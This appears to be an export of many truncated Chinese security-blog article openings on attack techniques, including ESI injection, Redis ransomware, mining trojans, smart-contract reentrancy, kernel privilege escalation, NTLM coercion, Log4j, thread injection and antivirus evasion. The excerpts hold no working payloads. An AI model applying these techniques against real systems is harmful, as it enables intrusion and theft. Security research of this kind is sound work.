不知道大家有没有遇到过这样的情况:某个微信群突然有陌生人通过扫描自己“分享”的二维码加群,然后发布各种违规小广告狂轰乱炸。但是自己根本没有分享过群二维码,这到底是怎么回事呢?通过深入研究发现,出现这种状况的微信用户有一个共同点:
**他们基本都使用过市面上“清理僵尸粉”的服务。**
图片来自网络
## 常见的“清粉”三步曲
## “清粉”的哪个环节导致信息泄露?
这类“清理僵尸粉”服务大多采用“推荐好友”“转发获取奖品”等手段,诱导用户分享转发。部分用户在使用“清粉”服务不久后,就会发现有陌生人通... | 社区文章 |
文章来源:<https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection>
* * *
### 前言
在某次评估客户资产安全时,我们发现 _Edge Side Includes (ESI)_
的标记语言存在异常行为,这种语言在HTTP中间件中被广泛使用(例如:反向代理,均衡负载,缓存服务器和代理服务器等等)。我们发现ESI攻击可以造成SSRF,多种XSS攻击(无视
_HTTPOnly_ 等cookie保护措施)和基于服务端的拒绝服务攻击。这种攻击技术被称为:ESI注入。
经进一步研究,我们发现众多流行服务都可以解析处理ESI语言,例如:... | 社区文章 |
# 安全事件
9月10日下午15:06开始,阿里云官方首次发现一起规模化利用Redis
未授权访问漏洞进行加密货币勒索的事件,阿里云上防御系统在攻击开始的10s内就已开启全网拦截。
与以往的只是通过算力窃取进行挖矿的攻击事件不同,此次攻击者在攻击之初就是以勒索钱财作为第一目的的,攻击者无惧暴露,非常猖狂。直接删除数据、加密数据也意味着攻击者与防御者之间已经没有缓冲地带,基本的攻防对抗将是赤裸裸的一场刺刀战。
该高危漏洞早在半年前阿里云就发布过预警,但是还是有不少用户并未进行修改加以重视。阿里云安全专家提醒用户参考文末方法,尽快完成漏洞修复或部署防御,一旦被攻击成功,整个服务器的程序和数据都将会被删除!且很难恢复。
# Redis应用... | 社区文章 |
### 前言
现在随便下载一个APP进行注册,虽然都是用手机号作为注册账号,但还是需要1分多钟才能完成注册流程。先要输入字符验证码证明你是一个真实用户,然后再去请求短信验证,最后输入确认码才算结束。过程中的每个环节都有可能输错重来,用户体验实在不好。
### 为什么APP的注册流程这么复杂呢?
注册作为网站和APP的重要交互端口,是一切用户行为的源头。但是APP面对的不只是正常的目标用户,还有各种类型的黑产大军。因此注册端口也饱受黑产攻击的困扰。黑产要入侵一般都是先从“攻陷”注册场景开始。攻陷了注册场景后,就可以大批量注册账号,为后续的黑产活动做准备。所以,APP运营者就需要各种安全工具来防范黑产的攻击,开头提到的字符验证码和短信验... | 社区文章 |
# 2018上半年互联网恶意爬虫分析:从全景视角看爬虫与反爬虫
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
导语:互联网最激烈的对抗战场,除了安全专家与黑客之间,大概就是爬虫与反爬虫领域了。据统计,爬虫流量早已超过了人类真实访问请求流量。互联网充斥着形形色色的爬虫,云上、传统行业都有不同规模的用户被爬虫爱好者盯上,这些爬虫从哪里来?爬取了谁的数据?数据将被用于何处?
近日,腾讯云发布2018上半年安全专题系列研究报告,该系列报告围绕云上用户最常遭遇的安全威胁展开,用数据统计揭露攻击现状,通过溯源还原攻击者手法,让企业用户与其他用户在应对攻击时有迹可循,并为其提供可靠的安全指南。本篇报告中,云鼎... | 社区文章 |
### 一、前言
最近在对区块链漏洞进行一些代码研究,在实例复现以及竞赛题目的研究中,我发现整数溢出是现在区块链比较火的漏洞之一。但是整数漏洞的技术难度并不大,容易理解。但是它常常出现在Solidity代码中,容易被攻击者利用。
本篇文章中,我们就针对整数溢出漏洞进行原理上的分析,并对部分实例以及竞赛题目进行线上实验,并提出一些预防措施。
### 二、漏洞介绍
在介绍整数溢出漏洞前,我们需要先简单介绍一下Solidity中的部分语法知识。
在solidity中,我们知道在变量类型中有`int/uint`(变长的有符号与无符号整形)类型。这类变量支持以8递增,支持从uint8到uint256,以及int8到int256。而需要我们注意... | 社区文章 |
# 【木马分析】比特币挖矿木马Ddg分析
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
**引言**
近年来go语言火热,一些恶意软件也闻风而起,然而go程序在编译过程中集成了大量的基础库,并且不同版本格式也存在较大差异,给逆向带来不小的阻力。乐视云安全攻防小组专注于应急事件响应,二进制安全,让我们一起剖析下基于go的恶意软件.
近日,乐视安全中心接获用户服务器高负载告警,经安全人员协查分析,发现是通过redis漏洞传播的挖矿木马-ddg,大量消耗服务器资源,难以清除并具有内网扩散功能。本文为乐视安全中心对木马具体原理功能及传播方式进行的分析,以及给出的解决方案。... | 社区文章 |
# 1月12日安全热点–补丁之后Intel芯片性能/D-Link路由器代码执行
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 资讯类
Intel表示补丁可能会导致使用搭载旧芯片计算机的重启问题
(Intel公司周四表示,最近发布的芯片漏洞补丁可能会导致使用旧版Broadwell和Haswell处理器的计算机重启次数比平时多,而且Intel可能需要发布更新来修复这个漏洞修补程序。)
<https://news.hitb.org/content/intel-says-patches-can-cause-reboot-problems-old-chips>
Intel官方发布的性能对比(使用/未... | 社区文章 |
# Not a fair game, Dice2win公平性分析
##### 译文声明
本文是翻译文章,文章原作者 Peng Zhiniang,文章来源:blogs.360.cn
原文地址:<http://blogs.360.cn/post/Fairness_Analysis_of_Dice2win.html>
译文仅供参考,具体内容表达以及含义原文为准。
> 作者:Zhiniang Peng from Qihoo 360 Core Security
>
> Dice2win
> 目前是以太坊上一款异常火爆的区块链博彩游戏。号称“可证明公平的”Dice2win目前每日有近千以太(一百五十万人民币)的下注额,是总交易量仅次于ether... | 社区文章 |
**作者:Al1ex@七芒星实验室**
**原文链接:<https://mp.weixin.qq.com/s/YAPP-Hv71J3OxE5WZZikrA>**
#### 文章前言
以太坊智能合约中的函数通过private、internal、public、external等修饰词来限定合约内函数的作用域(内部调用或外部调用),而我们将要介绍的重入漏洞就存在于合约之间的交互过程,常见的合约之间的交互其实也是很多的,例如:向未知逻辑的合约发送Ether,调用外部合约中的函数等,在以上交互过程看似没有什么问题,但潜在的风险点就是外部合约可以接管控制流从而可以实现对合约中不期望的数据进行修改,迫使其执行一些非预期的操作等。
#### 案... | 社区文章 |
本文翻译自:<https://research.checkpoint.com/ramnits-network-proxy-servers/>
作者:Alexey Bukhteyev
* * *
Ramnit是目前最大的银行僵尸网络之一,最近checkpoint研究人员发现一起新的Ramnit大规模活动——Black,两个月就感染主机超过10万。其主要作用是将受害者设备变成恶意代理服务器。之后,僵尸网络就可以做很多用途了,研究人员认为这不是攻击活动的冰山一角,也意味着新的大规模攻击活动即将来临。
图2: Ramnit “black”僵尸网络地理分布
僵尸网络有很多新的特征:
* 很多样本使用硬编码的域名而不是DGA;
* ... | 社区文章 |
# 【CTF攻略】第七届swpu-ctf官方Writeup
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**作者:**[ **08067**](http://bobao.360.cn/member/contribute?uid=2652321373)
**预估稿费:300RMB(不服你也来投稿啊!)**
**投稿方式:发送邮件至linwei#360.cn,或登陆**[
**网页版**](http://bobao.360.cn/contribute/index) **在线投稿**
**比赛地址:**[ **ctf.08067.me** ****](http://ctf.08... | 社区文章 |
# 【技术分享】从JS文件中发现『认证绕过』漏洞
|
##### 译文声明
本文是翻译文章,文章来源:blogspot.com
原文地址:<http://c0rni3sm.blogspot.com/2017/06/from-js-to-another-js-files-lead-to.html>
译文仅供参考,具体内容表达以及含义原文为准。
翻译:[ **h4d35**](http://bobao.360.cn/member/contribute?uid=1630860495)
预估稿费:120RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**前言**
本篇文章主要介绍了在一次漏洞悬赏项目中如何利用配... | 社区文章 |
作者:Hcamael@知道创宇404区块链安全研究团队
在我们对etherscan等平台上合约进行安全审查时,常常会遇到没有公布Solidity源代码的合约,只能获取到合约的OPCODE,所以一个智能合约的反编译器对审计无源码的智能合约起到了非常重要的作用。
目前在互联网上常见的反编译工具只有[porosity](https://github.com/comaeio/porosity
"porosity")[1],另外在Github上还找到另外的反编译工具[ethdasm](https://github.com/meyer9/ethdasm
"ethdasm")[2],经过测试发现这两个编译器都有许多bug,无法满足我的工作需求。因... | 社区文章 |
说明:实验所需的驱动源码、bzImage、cpio文件见[我的github](https://github.com/bsauce/kernel_exploit_series)进行下载。本教程适合对漏洞提权有一定了解的同学阅读,具体可以看看我先知之前的文章,或者[我的简书](https://www.jianshu.com/u/a12c5b882be2)。
从任意地址读写到提权的方法,可以参考[【linux内核漏洞利用】StringIPC—从任意读写到权限提升三种方法](https://www.jianshu.com/p/07994f8b2bb0)。
# 一、漏洞代码分析
代码见`arbitrary.h`。
### 1.功能函数介绍
功... | 社区文章 |
## 起因
> 在对某网站渗透过程中,通过报错页面发现网站架构为ThinkPHP 5.0.23,存在method
> RCE漏洞。但是,使用常规payload提示`__construct`关键字被禁用,因此payload无法生效。但是这个漏洞的关键点不在于`__construct`方法,而是`Request`类的`method`方法可以让我们调用类中的任意方法,因此,开始寻找另一条利用链。
## 分析
* 漏洞利用点
* `Request`类的`method`方法可以让我们调用类中的任意方法
* 分析
* 该类为ThinkPHP的请求类,主要存放请求中的各种信息,没有方法直接执行代码,但是通过`filter`... | 社区文章 |
# Windows内网协议学习NTLM篇之发起NTLM请求
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:daiker@360RedTeam
## 0x00 前言
这篇文章是ntlm篇的第二篇,怎么发起ntlm请求。在 阅读这篇文章之前,有两点说明
1. 这篇文章的主要内容是使服务器向攻击者发起ntlm 请求,但是没有进一步利用,因此本篇文件的表述都是获得net-ntlm hash。使用Responder来捕获。Responder的用法可自行搜索。这里不展开。
2. 有些地方较为敏感,因此使用的net-ntlm hash的截图并非真实图片。这个地方不重要,主要证明能发起请求就行,出... | 社区文章 |
前几天发现了一个专属的已授权网站存在逻辑漏洞,整个过程比较的奇幻,这里就分享给大家。
# 过程
## 前期排查和信息收集
在对该网站进行信息收集的时候,我发现了其中的后台登录点,便想着用弱口令看看可不可以直接登录。这里先尝试admin123/admin123,这里出现了账号密码错误的提示,提示如下图,通过后续的渗透可以知道admin123这个账户不存在:
[
然后再继续尝试admin/admin后,它的提示就和上面的不一样了,提示如下。这说明了在这里存在admin这个账户。通过后续的渗透可以知道admin这个账户应该是最高权限的管理员,想要成功登录该账户应该得需要内网环境才可以:
[
这些前期工作全部都排查完成后,下面就要开... | 社区文章 |
**前言**
本来该系列只有八篇,这篇是由于之前设计题目的过程中,别人给出了多个我没想到的解法思路,所以就专门写了这个番外篇。
三道题的题目地址如下:
<http://px1624.sinaapp.com/test/shortxss.php>
<http://px1624.sinaapp.com/test/shortxss1.php>
<http://px1624.sinaapp.com/test/shortxss2.php>
其中前两题主要是以长度限制的绕过思路为主进行设计的,第三题这个的主要难点,是绕过if这个逻辑判断,也是这篇文章讲述的重点。
**正文**
**1 首先是第一题**
<http://px1624.sin... | 社区文章 |
# 2015年中国高持续性威胁(APT)研究报告#PDF下载#
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
译文仅供参考,具体内容表达以及含义原文为准。
**目录**
第一章 简介…………………………………………………………………………………………………………………….3
第二章 本报告的研究方法……………………………………………………………………………………………….4
一、 研究对象…………………………………………………………………………………………………….4
二、 方法思路…………………………………………………………………………………………………….4
三、 时间范围…………………... | 社区文章 |
原文地址:<http://blog.adm1nkyj.kr>
译者:欧巴@知道创宇404实验室
#### 简介
Gnuboard是韩国Sir公司开发一套PHP+Mysql CMS程序。
本身数据结构简单,可扩展性能强,程序运行代码与皮肤文件分离,可扩展数据字段多,可以进行多种功能转变,简单安装就可以作为BBS告示板使用,也可以下载皮肤插件变成
综合网站,地方信息,购物,人才市场,物品交易网站。
#### Gnuboard stored xss
之前记录的一个漏洞,漏洞触发点比较有趣,而且威胁也大,所以就发到博客。
首先看一下 index.php代码
<div style="float:left;<?php echo $l... | 社区文章 |
# Windows DNS Server远程代码执行漏洞(CVE-2021-24078)的详细原理分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 漏洞简介
Windows DNS Server 是 Windows Server 服务器上的一项重要功能组件, 负责调度和处理域内主机的所有DNS相关服务。
奇安信代码安全实验室的研究员在Windows DNS
Server中发现一个严重的远程代码执行漏洞。它是首个由国内安全研究员发现并提交的蠕虫级漏洞,危害巨大,CVSS 评分为9.8分,堪比微软去年修复的另外一个
Windows DNS Server RCE漏洞
(CVE-2020-135... | 社区文章 |
# 远线程注入
## Author:ILU
## 学的越多,才知道自己的渺小
## 前言
前两天更新了过waf相关的内容,这部分内容其实是为了调剂下枯燥的win32学习过程。开心的是阅读的人蛮多的,伤心的是没人进星球,可能太基础了吧。
今天要写的是远线程注入相关的知识,此部分可以对远程进程进行shellcode注入,dll注入或者代码的注入等。C语言真的很强大,对于操作系统来讲,无所不能啊。
## 正题
###### 什么是远线程注入?
`远程线程注入是指一个进程在另一个进程中创建线程的技术`
举个例子:比如说我当前打开了一个进程A,然后通过某些手段:比如自己写一个程序,利用此程序获取当前打开进程A的句柄(句柄相当于一个控制器,我们... | 社区文章 |
# 通过太阳和投射的阴影进行人员地理位置定位
##### 译文声明
本文是翻译文章,文章原作者 黑鸟,文章来源:黑鸟
原文地址:<https://mp.weixin.qq.com/s/SY3YXYse94AvP8IXaghlyw>
译文仅供参考,具体内容表达以及含义原文为准。
近日,著名开源情报分析公司贝灵猫发布了一篇关于通过太阳投射的阴影位置进行地理定位的教程,基于此以后恐怕只敢在室内拍照了,下面请看详情。
首先需要先介绍一个免费工具,该工具名为SunCalc,可以用来定位计时。
(Chronolocation)地址:https://www.suncalc.org/
如下图所示,根据右侧的太阳阴影位置可以判断图片当前时间,并结合当... | 社区文章 |
# 禅道pms-路由及漏洞分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
故事起源于一次校园网内扫描,扫到一台禅道的服务器,遂开始分析起了一些历史漏洞,但是由于版本原因在服务器上都没有成功 ==、
文本分析了下禅道中路由的设置,以及一些历史漏洞,若有疏漏,还望斧正。
## 路由分析
路由是分析和审计cms前一个很重要的点,能了解整个cms的基本框架和代码流程。
禅道各个版本中路由没有什么较大的变化,这里以9.1.2为例进行分析。
首先,禅道里有两种类型的路由,分别对应者两种不同的url访问方式
* PATHINFO:`user-login-L3plbnRhb3BtczEwL... | 社区文章 |
Windows7是我经常工作使用的操作系统,为了进一步保证安全性,我安装了[卡巴斯基网络安全反病毒软件——KIS](https://www.kaspersky.com/internet-security)。有一天,我在一个网页中发现一段有趣的代码,然而这段代码本身并不应该出现在这样的网页中。
为什么 FaceBook
的网站嵌入了卡巴斯基站点的js文件?我马上意识到,我所安装的杀软(卡巴斯基)针对https进行了类似中间人攻击(MITM)的行为,并在当前活动的页面中注入了它自己的代码以便跟踪分析网页。
嗯……,为什么不创建一个特定的网页来监视那段JavaScript代码呢?并且利用这点可以分析出客户端安装了哪种杀软?包括KIS。... | 社区文章 |
# Log4J 漏洞复现+漏洞靶场
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
前几天晚上朋友圈算是过了年了,一个log4j大伙都忙了起来,看着朋友圈好久没这么热闹了。Apache
的这个log4j这个影响范围的确是大,包括我自己做开发的时候也会用到log4j,这就很尴尬了。
大家也不要在公网上疯狂测试了,我给大家带来了漏洞靶场,攻击视频在下文,一步一步教你。
漏洞原理我改天会详细的写一篇文章出来,今天就主要是复现一下漏洞。
昨晚爆出的log4j rce
是通过lookup触发的漏洞,但jdk1.8.191以上默认不支持ldap协议,对于高版本jdk,则需要一定的依赖。不过为了给大... | 社区文章 |
# 用sqlmap解题2018HCTF-Kzone
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
刚好周末,参加了一下HCTF,于是写篇文章记录一下 ~~也补一补双十一剁手的元气~~ 。
## 信息搜集
打开题目
http://kzone.2018.hctf.io
发现跳转到QQ空间,想到可能是钓鱼网站,于是curl一下
发现如下代码
<!--<form id="form" action="index.php" method="post" onsubmit="return onpost()"> -->
<form action="2018.p... | 社区文章 |
# 一道CTF题引起的对laravel v8.32.1序列化利用链挖掘
* * *
## 0x00 前言
前几天刚搞完 **V &NCTF** ,里边有一道 **easy_laravel** 题目引起了我的注意(
~~指挖了一下午的序列化链,结果路由不正确无法利用CVE反序列化,呜呜呜,气死我耶~~ ),于是就将整个有趣( ~~心酸~~ )的过程写出来分享一下吧。
## 0x01 利用条件
* 需要配合一个完全可控的反序列化点( ~~比如结合CVE,不过这里的版本是目前最新版 v8.32.1~~ )
## 0x02 环境配置
先配好 **8.32.1** 版本的 **laravel** ,确保当前版本正确。
然后在 `publi... | 社区文章 |
# CVE-2020-0601 ECC证书欺骗漏洞分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:Strawberry @ QAX A-TEAM
2020年1月15日,微软公布了1月份的补丁更新列表,其中包括一个椭圆曲线密码(ECC)证书检测绕过相关的漏洞(CVE-2020-0601),该漏洞由NSA发现并汇报给微软。攻击者可利用这个漏洞伪造合法证书,进一步可实现对恶意软件及恶意网站证书的签名。奇安信CERT第一时间发布了该漏洞的修补通告,并于次日对该漏洞进行原理分析及复现。本文主要参考Trend
Micro于上月发布的文章《An In-Depth Technical Analysis... | 社区文章 |
# 前言
在日常的渗透测试中,我们直接将metaspolit、CS等工具直接生成的恶意程序或代码发送到目标系统时,通常会遇防病毒和入侵检测系统的查杀。这使得我们的程序被拦截或者运行不稳定。有时候IP还会直接被封杀,增加了我们的攻击难度,这篇文章中,将为大家分享一些自己免杀的学习方法论,一些常用的AV和IDS规避技术,可以用于绕过一些安全软件。
# 编码器
通过一定规律的编码算法,将对metaspolit、CS生成的shellcode进行编码/模糊处理/变形,从原始shellcode中删除所有无效的字符,从而逃避杀毒软件检测。
编码算法
可以使用多种算法对Shellcode进行编码,包括(但不限于):
1、在特定位置添... | 社区文章 |
# ARM固件基址定位工具开发
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 一、摘要
现在iot安全已经是一个热点了,嵌入式设备固件的逆向分析也成了师傅们比较关心的一个话题。
如果是普通的可执行文件,或者是动态链接库文件(例如路由器安全研究的情形下我们拿到了完整的文件系统),它们都是标准的二进制格式(比如elf),丢进IDA后,IDA就把工作统统给我们做好了。
但是有的时候我们拿到的固件压根就不是标准的二进制格式,IDA不知道它的架构和指令集。架构可以通过查芯片文档得知,因此我们可以在IDA最初的配置界面选择对应的反汇编处理器,但是问题是IDA并不知道固件的加载基址,也就无法建立正确... | 社区文章 |
前几个月XStream爆出一堆漏洞,这两天翻了翻,发现这波洞应该是黑名单绕过的最后一波了。因为在最新版的XStream
1.4.18中已经默认开启白名单的安全框架,按照XStream官方补漏洞的习惯,应该不会再接受新的绕过黑名单的漏洞了。
## 挑肥拣瘦
这波漏洞一共14个,基本上都是RCE的级别,先简单梳理一下。
CVE ID | PoC
---|---
CVE-2021-39139 | RCE
CVE-2021-39140 | DoS
CVE-2021-39141 | JNDI Based RCE
CVE-2021-39144 | RCE
CVE-2021-39145 | JNDI Based RCE ... | 社区文章 |
# 【漏洞预警】CVE-2016-10229:Linux 内核远程代码执行漏洞
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
漏洞描述:
**漏洞编号:** CVE-2016-10229
**漏洞危害:** 严重,攻击者利用该漏洞可实现linux内核远程代码执行,可能导致系统被完全控制或拒绝服务。
**影响范围:** 详细影响范围见下文。
**补丁地址:**<http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=197c949e7798fbf28cfadc69d9ca0c2ab... | 社区文章 |
# “公检法”的叔叔给你打电话?骗子的演技又提高了!
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作为遵纪守法的社会好公民、时代好青年你或许从来没想过,居然有一天会接到“公安局”、“国家安全局”、“互联网举报中心”们打来的电话。不是涉嫌洗钱、非法集资,就是发布违规信息。
一开始大多数人都不相信,但对方却能准确报出自己的姓名、身份证号,甚至还会现场视频连线身着警服的“警察叔叔”,这让很多人信以为真、最终被骗。其实这只是篇冒充“公检法”在你面前上演的一出戏而已!
## 冒充公检法诈骗的“三步套路”
**第一步**
骗子先通过非法渠道获取受害人身份等信息。
**第二步**
冒充“公安局、通信管理局、... | 社区文章 |
# Ramnit感染型病毒分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
感染型病毒是通过感染将恶意代码附着于正常程序中,在通过被感染的正常程序进行传播,可见感染型病毒的危害之大。不过只要了解了感染型病毒的原理,其实并没有想象中的那么可怕,今天我将带来的是感染型病毒Ramnit的详细分析。
## 样本信息
样本是我随便找的一个被Ramnit病毒感染的crackme程序
样本名:crack_me(cracked).exe
SHA1:537c992c86674a442eb3c33140feaeec7ae4ab91
## 行为分析
使用火绒剑进行行为分析
被感染的样本... | 社区文章 |
[TOC]
## 0x1 Forward
这篇文章的雏形我是发在了t00ls,后来我想了下还有其他挺有意思的内容还没总结进来,于是就有了一篇升级版(ps水货本质还是没变),希望有需要的师傅可以阅读看看。
## 0x2 MySQL 基础知识
#### 1.字符串截取函数
left(str,index) //从左边第index开始截取
right(str,index) //从右边第index开始截取
substring(str,index) //从左边index开始截取
substr(str,index,len) //截取str,index开始,截取len的长度
mid(str,index,... | 社区文章 |
[jQuery-File-Upload](https://github.com/blueimp/jQuery-File-Upload) 是 Github
上继 jQuery 之后最受关注的 jQuery 项目,该项目最近被披露出一个存在了长达三年之久的任意文件上传漏洞,该漏洞在随后发布的 v9.22.2
版本中被修复,但是在 [VulnSpy](http://www.vulnspy.com/)
团队对代码的复查中发现了另外一个严重的命令执行漏洞,该漏洞允许攻击者通过上传恶意的图片文件来执行任意系统命令。
### 漏洞细节
在 jQuery-File-Upload 的 PHP 上传处理文件
[/server/php/UploadHan... | 社区文章 |
# 青蛙旅行 — Unity3d类安卓游戏逆向分析初探
##### 译文声明
本文是翻译文章,文章原作者 猎户安全实验室;黄小秋,文章来源:paper.seebug.org ;.zhihu.com;
原文地址:<https://paper.seebug.org/519/ ;
https://www.zhihu.com/question/68733553/answer/305463907>
译文仅供参考,具体内容表达以及含义原文为准。 | 社区文章 |
# 关于Windows RPC挖掘的那些事
## 0x01 前言
最近在研究与Windows本地提权相关的安全问题,发现其实就本地提权而言,不局限于BypassUAC和通过内核漏洞,提权还存在非常多的其他手段,在这里主要是想结合Windows中的RPC机制,讲述笔者是如何通过对Windows中的RPC方法进行Fuzz,从而挖掘出Windows尚未进行修复和改进的一些漏洞,进而利用这些漏洞实现本地提权的目的,值得一提的是,和`pipepotato`类似,由于利用条件需要拥有`Impersonate`权限以及微软对于提权漏洞的判定来说,微软并不认为这是一个提权漏洞,因此相关披露已经得到了微软的许可
* * *
相关实现:
1.<ht... | 社区文章 |
**作者:t1ddl3r@百度蓝军
公众号:[百度安全应急响应中心](https://mp.weixin.qq.com/s/a_0Vbnr38drTZAlQfoH10A
"百度安全应急响应中心")**
### 前言
在正面防御越来越难突破的今天,各种钓鱼姿势层出不穷。本月的BlackHat
2020大会上出现了一种新型的macOS下的excel宏攻击,通过巧妙的漏洞链绕过了Mac沙箱,最终获得了一枚反弹shell。笔者在研究过程中遇到了一些坑点,最终成功复现。希望文章中的一些经验能够起到抛砖引玉的作用。
### 1.XLM宏与Sylk文件
Sylk文件是一种古老的office文件格式,虽然如今已经几乎不再使用此格式,但offic... | 社区文章 |
# 一次Thinkphp 5.0.X 反序列化的坎坷
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
并非专业选手、本文如有出错的地方,还请师傅们帮忙斧正,也是记录一下在项目中遇到thinkphp windows 环境下 RCE的踩坑。
事情就是图片这样,由于文件名的问题无法在WIndow环境下写入文件, 然后search到几篇解决Windows 文件名的文章,来拼凑解决这次的坎坷。
## 调试环境
Apache2.4.39 PHP7.1.9nts Thinkphp5.0.24
在 application\index\controller\index.php 修改代码如下,创建... | 社区文章 |
[toc]
## 前言
Pass The Hash 即哈希传递攻击,简称 PTH,该攻击方法通过找到与账户相关的密码散列值 NTLM Hash 来进行攻击的。由于在 Windows
系统 NTLM 认证的 TYPE 3 消息计算 Response 的时候,客户端是使用用户的 NTLM Hash
进行计算的,而不是用户密码进行计算的。因此在模拟用户登录或对访问资源的用户进行身份认证的时候,是不需要用户明文密码的,只需要用户 Hash。攻击者可以利用
NTLM HASH 直接远程登录目标主机或反弹 Shell。
在域环境中,用户登录计算机时一般使用域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,因此,如果计算机的本地管理员账... | 社区文章 |
# 【技术分享】Flash的跨域问题
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
作者:MerJerson@360CERT
**0x00 背景**
Flash是一种动画创作与应用程序开发于一身的创作软件,到2013年9月2日为止,最新的零售版本为AdobeFlash
ProfessionalCC(2013年发布)。Adobe Flash Professional
CC为创建数字动画、交互式Web站点、桌面应用程序以及手机应用程序开发提供了功能全面的创作和编辑环境。Flash广泛用于创建吸引人的应用程序,它们包含丰富的视频、声音、图形和动画。可以在Flash中创建原始内容或者... | 社区文章 |
原文:http://sirdarckcat.blogspot.jp/2016/12/how-to-bypass-csp-nonces-with-dom-xss.html
原作者:EDUARDO VELA
译: **Holic (知道创宇404安全实验室)**
**TL;DR**
CSP nonces 在对抗 DOM XSS 方面似乎并没有所谓的奇效。你可以通过几种方法绕过它们。我不知道如何修复,也许不应该修复。
> 感谢阅读。这篇博文介绍了绕过 CSP nonce 的方法。从上下文入手,然后介绍了在几种情况下绕过 CSP nonce
> ,结尾是一些评论。一如既往,这篇博文是我对这些问题的个人意见,而且很想听到你的观点。
### 我... | 社区文章 |
Subsets and Splits
Top 100 EPUB Books
This query retrieves a limited set of raw data entries that belong to the 'epub_books' category, offering only basic filtering without deeper insights.